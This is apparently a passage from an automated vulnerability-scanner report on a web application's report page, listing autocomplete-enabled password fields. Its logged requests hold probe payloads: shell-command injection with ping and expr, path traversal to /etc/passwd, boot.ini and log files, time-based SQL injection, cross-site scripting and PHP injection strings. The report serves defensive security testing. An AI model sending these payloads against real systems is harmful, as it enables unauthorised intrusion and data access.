Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:39 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:39 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=%2Bresponse.write(268409241-22)%27" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.261. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=ping%20-c%2026%20127.0.0.1%20%26

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=ping%20-c%2026%20127.0.0.1%20%26 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:44 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=ping%20-c%2026%20127.0.0.1%20%26" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.262. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000006)%3C/script%3E

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000006)%3C/script%3E HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:37 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:37 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000006)%3C/script%3E" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.263. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=../../../../../../../../../../boot.ini%00

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=../../../../../../../../../../boot.ini%00 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../boot.ini%00" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.264. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=%26%20ping%20-n%2026%20127.0.0.1%20%26

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=%26%20ping%20-n%2026%20127.0.0.1%20%26 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=%26%20ping%20-n%2026%20127.0.0.1%20%26" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.265. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=ping%20-n%2026%20127.0.0.1%20%26

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=ping%20-n%2026%20127.0.0.1%20%26 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:41 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=ping%20-n%2026%20127.0.0.1%20%26" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.266. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=%26ping%20-c%2026%20127.0.0.1%20%26

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=%26ping%20-c%2026%20127.0.0.1%20%26 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

17.267. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=expr%20268409241%20-%202%20%26

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=expr%20268409241%20-%202%20%26 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:48 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:48 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=expr%20268409241%20-%202%20%26" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.268. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=../../../../../../../../../../../etc/passwd%00index.cfm

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=../../../../../../../../../../../etc/passwd%00index.cfm HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:52 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:52 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../../etc/passwd%00index.cfm" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.269. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=%27%26%20ping%20-n%2026%20127.0.0.1%20%26

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=%27%26%20ping%20-n%2026%20127.0.0.1%20%26 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=%27%26%20ping%20-n%2026%20127.0.0.1%20%26" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.270. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=-111%20OR%20SLEEP(25)=0%20LIMIT%201--+

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=-111%20OR%20SLEEP(25)=0%20LIMIT%201--+ HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:51 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:51 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=-111%20OR%20SLEEP(25)=0%20LIMIT%201--+" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.271. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=http://netsparker.com/n

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=http://netsparker.com/n HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:38 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:38 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=http://netsparker.com/n" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.272. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?nsextt='%22--%3e%3c/style%3e%3c/script%3e%3cscript%3enetsparker(0x000004)%3c/script%3e

The form contains the following password field with autocomplete enabled:

j_password

Request

GET /hmc/report/index.cfm?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000004)%3C/script%3E HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:39 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:39 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:39 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:39 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">

<form name="form1" action="/hmc/report/index.cfm?nsextt='%22--%3e%3c/style%3e%3c/script%3e%3cscript%3enetsparker(0x000004)%3c/script%3e" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...

17.273. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=%3c%3f+print(int)0xFFF9999-22%3b%2f%2f%3f%3e

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=%3c%3f+print(int)0xFFF9999-22%3b%2f%2f%3f%3e HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30f0eb525229456582
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:47 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:47 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=%3c%3f+print(int)0xFFF9999-22%3b%2f%2f%3f%3e" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.274. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=%27%26ping%20-c%2026%20127.0.0.1%20%26%27

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=%27%26ping%20-c%2026%20127.0.0.1%20%26%27 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:42 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:42 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=%27%26ping%20-c%2026%20127.0.0.1%20%26%27" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.275. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?nsextt='%3e%3cnet%20sparker=netsparker(0x00001b)%3e

The form contains the following password field with autocomplete enabled:

j_password

Request

GET /hmc/report/index.cfm?nsextt='%3E%3Cnet%20sparker=netsparker(0x00001B)%3E HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:42 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:43 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:43 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:42 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">

<form name="form1" action="/hmc/report/index.cfm?nsextt='%3e%3cnet%20sparker=netsparker(0x00001b)%3e" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...

17.276. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=%27))%3BSELECT%20pg_sleep(25)--

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=%27))%3BSELECT%20pg_sleep(25)-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e3042a9b6d0213f1e43
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:10 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:10 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=%27))%3BSELECT%20pg_sleep(25)--" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.277. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=../../../../../../../../../../etc/httpd/logs/error_log

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=../../../../../../../../../../etc/httpd/logs/error_log HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:45 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:45 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../etc/httpd/logs/error_log" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.278. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?nsextt=//netsparker.com/n/n.css?0x000016

The form contains the following password field with autocomplete enabled:

j_password

Request

GET /hmc/report/index.cfm?nsextt=//netsparker.com/n/n.css?0x000016 HTTP/1.1
